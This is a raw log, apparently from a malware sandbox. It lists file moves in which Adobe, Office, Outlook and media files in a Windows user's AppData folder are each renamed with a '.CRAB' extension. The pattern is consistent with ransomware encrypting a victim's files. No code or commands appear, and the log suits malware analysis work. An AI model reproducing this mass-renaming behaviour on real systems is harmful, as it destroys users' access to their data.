Move C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001103[[fn=Headlines]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001103[[fn=Headlines]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001104[[fn=Feathered]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001104[[fn=Feathered]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001105[[fn=Crop]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001105[[fn=Crop]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM16401371[[fn=Atlas]].thmx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM16401371[[fn=Atlas]].thmx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835231[[fn=Text Cover with TOC (Student Report Blue design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835231[[fn=Text Cover with TOC (Student Report Blue design)]].docx True 1
Fn
